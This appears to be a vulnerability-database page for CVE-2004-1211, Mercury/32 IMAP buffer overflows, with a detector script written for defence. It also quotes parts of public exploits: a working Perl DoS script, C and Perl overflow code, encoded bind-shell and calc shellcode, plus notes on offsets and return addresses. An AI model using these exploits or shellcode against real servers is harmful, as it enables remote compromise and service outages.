CVE-2004-1211
Published: 2005-01-10
Priority: P3 · 52 · Severity: critical, CVSS 2.0 base score 10
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public exploit code available (see the Exploit-DB and Metasploit entries below)
EPSS: 72.46% (99.4th percentile)
Multiple buffer overflows in the IMAP service in Mercury/32 4.01a allow remote authenticated users to cause a denial of service (application crash) and possibly execute arbitrary code via long arguments to the (1) EXAMINE, (2) SUBSCRIBE, (3) STATUS, (4) APPEND, (5) CHECK, (6) CLOSE, (7) EXPUNGE, (8) FETCH, (9) RENAME, (10) DELETE, (11) LIST, (12) SEARCH, (13) CREATE, or (14) UNSUBSCRIBE commands.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| david_harris | mercury | — | — |
| david_harris | mercury_32 | — | — |
Detection & IOCs (extracted from sources)

Bytes: `\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x29\x81\x73\x17\xb1\x74\x3f\x7c` (leading bytes of the calc.exe shellcode used by the Python SELECT PoC listed below)

Detection heuristics:
- Flag IMAP CHECK command payloads of 512 or more repeated bytes ('A' x 512) sent to port 143 as a DoS/overflow attempt against Mercury/32.
- Flag IMAP SELECT command arguments exceeding 260 bytes followed by a 4-byte little-endian RET address and NOP sled pattern on port 143.
- After exploitation, watch for outbound TCP connections from the Mercury/32 IMAP server process to attacker-controlled port 1981 (bind-shell callback) or inbound connections to port 4444 (bind shell).
- The Metasploit module targets the RENAME command specifically; monitor for IMAP RENAME arguments exceeding normal mailbox name lengths on port 143.
- Detect SMTP AUTH CRAM-MD5 base64-encoded payloads of anomalous length (>1300 bytes) sent to the Mercury/32 SMTP service; exploit DOC 7 delivers the overflow via the SMTP AUTH exchange.

Notes from the exploit sources:
- The overflow offset for the SELECT command exploit is 260 bytes before EIP overwrite; the RET address 0x782f28f7 is environment-specific and must be adjusted per target OS/DLL.
- The SMTP exploit (DOC 7) targets Mercury/32 SMTP versions 3.32 through 4.51 with different RET addresses per target; the universal target uses TER32.dll at 0x258d0d1e (jmp esp).
- The EIP overwrite offset for the SMTP AUTH CRAM-MD5 vector is at byte 204 within a 1300-byte buffer; shellcode is placed immediately after the 4-byte NOP sled following EIP.
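The heuristics above can be turned into a single stream-level check. The following is an added detection example, not code from the CVE record or from any of the PoCs listed on this page. It parses client-to-server IMAP command lines and flags the fourteen affected commands when their argument exceeds a length threshold, applying the two thresholds stated above (CHECK at 512 bytes or more, SELECT above 260 bytes) and generalizing to the remaining commands with a generic limit. The generic 256-byte limit, the `longest_run` helper and the sample session are assumptions constructed for this example; tune the limit to the mailbox-name lengths seen in your own traffic.

```python
"""Flag over-long IMAP command arguments of the kind CVE-2004-1211 abuses.

Added detection example: not part of the CVE record or the listed PoCs.
Thresholds for CHECK and SELECT come from the page's detection bullets;
ARG_LIMIT for the other commands is an assumption.
"""
import re
from typing import Optional

# The fourteen commands named in the CVE description, plus SELECT from the
# detection bullets.
AFFECTED = {
    "EXAMINE", "SUBSCRIBE", "STATUS", "APPEND", "CHECK", "CLOSE",
    "EXPUNGE", "FETCH", "RENAME", "DELETE", "LIST", "SEARCH",
    "CREATE", "UNSUBSCRIBE", "SELECT",
}

# Minimum argument length (bytes) that triggers a finding. CHECK: 512 or
# more; SELECT: more than 260. Everything else uses ARG_LIMIT (assumed).
THRESHOLDS = {"CHECK": 512, "SELECT": 261}
ARG_LIMIT = 256  # assumption: legitimate mailbox names / criteria stay below this

# RFC 3501 client command line: tag SP command [SP arguments]
LINE_RE = re.compile(r"^(?P<tag>\S+)\s+(?P<cmd>[A-Za-z]+)(?:\s+(?P<args>.*))?$")


def longest_run(s: str) -> int:
    """Length of the longest run of one repeated character (e.g. 'A' x 512)."""
    best = cur = 0
    prev = None
    for ch in s:
        cur = cur + 1 if ch == prev else 1
        prev = ch
        best = max(best, cur)
    return best


def classify_line(line: bytes) -> Optional[dict]:
    """Return a finding dict for a suspicious command line, else None."""
    text = line.decode("latin-1").rstrip("\r\n")  # latin-1: 1 char == 1 byte
    m = LINE_RE.match(text)
    if not m:
        return None
    tag, cmd, args = m.group("tag"), m.group("cmd").upper(), m.group("args") or ""
    if cmd == "UID":  # UID FETCH / UID SEARCH carry the real command next
        parts = args.split(None, 1)
        if not parts:
            return None
        cmd, args = parts[0].upper(), parts[1] if len(parts) > 1 else ""
    if cmd not in AFFECTED:
        return None
    limit = THRESHOLDS.get(cmd, ARG_LIMIT + 1)
    n = len(args)
    if n < limit:
        return None
    return {
        "tag": tag,
        "command": cmd,
        "arg_len": n,
        "max_run": longest_run(args),
        "reason": f"{cmd} argument of {n} bytes >= {limit}",
    }


def scan_session(lines) -> list:
    """Apply classify_line to every client line; return all findings in order."""
    return [f for f in (classify_line(ln) for ln in lines) if f is not None]


# Constructed sample session: three benign commands, three over-long ones.
SAMPLE_SESSION = [
    b"a001 LOGIN user pass\r\n",
    b"a002 SELECT INBOX\r\n",
    b"a003 FETCH 1:* (FLAGS)\r\n",
    b"a004 CHECK " + b"A" * 512 + b"\r\n",
    b"a005 SELECT " + b"B" * 300 + b"\r\n",
    b"a006 RENAME old " + b"C" * 400 + b"\r\n",
    b"a007 UID FETCH 1 BODY[]\r\n",
    b"a008 LOGOUT\r\n",
]

if __name__ == "__main__":
    for finding in scan_session(SAMPLE_SESSION):
        print(finding["tag"], finding["reason"], "max_run=%d" % finding["max_run"])
```

Run against the constructed session, only tags a004, a005 and a006 are reported; the `max_run` field makes the ('A' x 512) repeated-byte pattern from the first heuristic visible alongside the raw length.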
GHSA: GHSA-24fw-p524-4547: Stack-based buffer overflow in IMAPD in Mercury/32 4
ghsa_unreviewed · 2022-05-01 · CVSS 10.0 · CVE-2007-5018 [CRITICAL] · CWE-119
Stack-based buffer overflow in IMAPD in Mercury/32 4.52 allows remote authenticated users to execute arbitrary code via a long argument in a SEARCH ON command. NOTE: this issue might overlap with CVE-2004-1211.

GHSA: GHSA-fvpw-h9g4-v5hg: Multiple buffer overflows in the IMAP service in Mercury/32 4
ghsa_unreviewed · 2022-04-29 · CVE-2004-1211 [HIGH] · CWE-119
Same description as the CVE record above (fourteen affected IMAP commands).
No detection rules found.
Exploit-DB: Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit)
exploitdb · 2010-05-09 · CVE-2004-1211

```ruby
##
# $Id: mercury_rename.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow vulnerability in the
Mercury/32 v.4.01a IMAP service.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2004-1211'],
[ 'OSVDB', '12508'],
[ 'BID', '11775'],
[ 'NSS', '15867'],
],
'Pri
```
Exploit-DB: Mercury/32 Mail Server 3.32 < 4.51 - SMTP EIP Overwrite
exploitdb · 2007-08-26 · CVE-2004-2513

```c
#include
#include
#include
#pragma comment(lib,"ws2_32")
#include
void usage(char * s);
void logo();
void end_logo();
void prepare_shellcode(unsigned char * fsh, int sh);
void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh);
int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port);
SOCKET do_connect (char *remotehost, int port);
void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret) ;
void base64_decode(char const * encoded_string, char * ret) ;
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring);
char *optarg
```
Exploit-DB: Mercury/32 Mail Server 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow
exploitdb · 2007-03-24 · CVE-2004-1211

```perl
#!/usr/bin/perl
#
# https://www.securityfocus.com/bid/11775
# credit to Muts for this vulnerability
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
send $socket, $request, 0;
print "[+] Sent 1st request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);
my $request ="\x41" x 255;
send $socket, $request, 0;
print "[+] Sent 2nd request\n";
sleep(1);
my $request=("\x45" x7420).("\x90" x10).$happy.("\x90" x14).$shellcode.("\x41" x8).$nextseh.$seh.("\x90" x5).$jmp.("\x90" x533);
send $socket, $request, 0;
print
```
Exploit-DB: Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow
exploitdb · 2004-12-01 · CVE-2004-2513

```perl
#===== Start Mercury32_Overflow.pl =====
#
# Usage: Mercury32_Overflow.pl
# Mercury32_Overflow.pl 127.0.0.1 hello moto
#
# Mercury/32, v4.01a, Dec 8 2003
#
# Download:
# http://www.pmail.com/
#
#############################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "143",
                                    Proto => "TCP"))
{
    print "Attempting to kill Mercury/32 service at $ARGV[0]:143...";
    sleep(1);
    print $socket "0000 LOGIN $ARGV[1] $ARGV[2]\r\n";
    sleep(1);
    print $socket "0001 CHECK " . "A" x 512 . "\r\n";
    close($socket);
}
else
{
    print "Cannot connect to $ARGV[0]:143\n";
}
#===== End Mercury32_Overflow.pl =====
# milw0rm.com [2004-12-01]
```
Exploit-DB: Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (2)
exploitdb · 2004-12-01 · CVE-2004-2513

```c
/** Remote Mercury32 Imap exploit [14 types of attacks] WOW!
** By: [email protected]
**
** Notes: Second public release and both of them are Mercury32 ;)
** Again someone posted some dos code :( why bother?
** If you spent the time to look, it uses the same buffer for all 14 types of attacks and the size does not
** change. I did not check the asm but it's prob using the same routine for all 14 commands.
**
** Date: 12/01/04
**/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define version "1.0"
int usage(char *p);
char sc_bind[] =
//decoder
"\xEB\x0F\x5B\x80\x33\x96\x43\x81\x3B\x45\x59\x34\x53\x75\xF4\x74"
"\x05\xE8\xEC\xFF\xFF\xFF"
/
```
Exploit-DB: Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (1)
exploitdb · 2004-11-30 · CVE-2004-2513

```c
/* whitehat.co.il comments removed due to muts love */
/** Remote Mercury32 Imap exploit
** By: [email protected]
**/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define version "1.0"
int usage(char *p);
char sc_bind[] =
//decoder
"\xEB\x0F\x5B\x80\x33\x96\x43\x81\x3B\x45\x59\x34\x53\x75\xF4\x74"
"\x05\xE8\xEC\xFF\xFF\xFF"
//sc_bind_1981 for 2k/xp/2003 v1.03.10.09 by ey4s
//XOR with 0x96 (267 0x10B bytes)
"\x7E\xB2\x96\x96\x96\x22\xEB\x83\x0E\x5D\xD4\xE1\x2E\x4A\x4B\x8C"
"\xA5\x7F\x2D\x55\x38\x50\xBD\x2B\xB8\x48\xC1\xE4\x32\xB2\x24\xA4"
"\x96\x98\xCB\x5D\x48\xE2\xB4\xF5\x5E\xC9\xFC\xA6\xCD\xF2\x1D\x95"
"\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x
```
Exploit-DB: Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (3)
exploitdb · 2004-11-29 · CVE-2004-2513

```python
#########################################################
# #
# Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow #
# Discovered by : Muts #
# Coded by : Muts #
# WWW.WHITEHAT.CO.IL #
# Plain vanilla stack overflow in the SELECT command #
# #
#########################################################
import struct
import socket
from time import sleep
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Lame calc.exe shellcode - don't expect miracles!
sc2 = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x29\x81\x73\x17\xb1\x74"
sc2 += "\x3f\x7c\x83\xeb\xfc\xe2\xf4\x4d\x9c\x69\x7c\xb1\x74\x6c\x29\xe7"
sc2 += "\x23\xb4\x10\x95\x6c\xb4\x39\x8d\xff\x6b\x79\xc9\x75\xd5\xf7\xfb"
sc2 += "\x6c\xb4\x26\x91\x75\xd4\x9f\x83\x3d\xb
```
Metasploit: Mercury/32 v4.01a IMAP RENAME Buffer Overflow
This module exploits a stack buffer overflow vulnerability in the Mercury/32 v.4.01a IMAP service.
No writeups or analysis indexed.
References:
- http://home.kabelfoon.nl/~jaabogae/han/m_401b.html
- http://lists.grok.org.uk/pipermail/full-disclosure/2004-December/029701.html
- http://marc.info/?l=bugtraq&m=110193702909991&w=2
- http://secunia.com/advisories/13348
- http://www.osvdb.org/12508
- http://www.securityfocus.com/bid/11775
- https://exchange.xforce.ibmcloud.com/vulnerabilities/18318

Published: 2005-01-10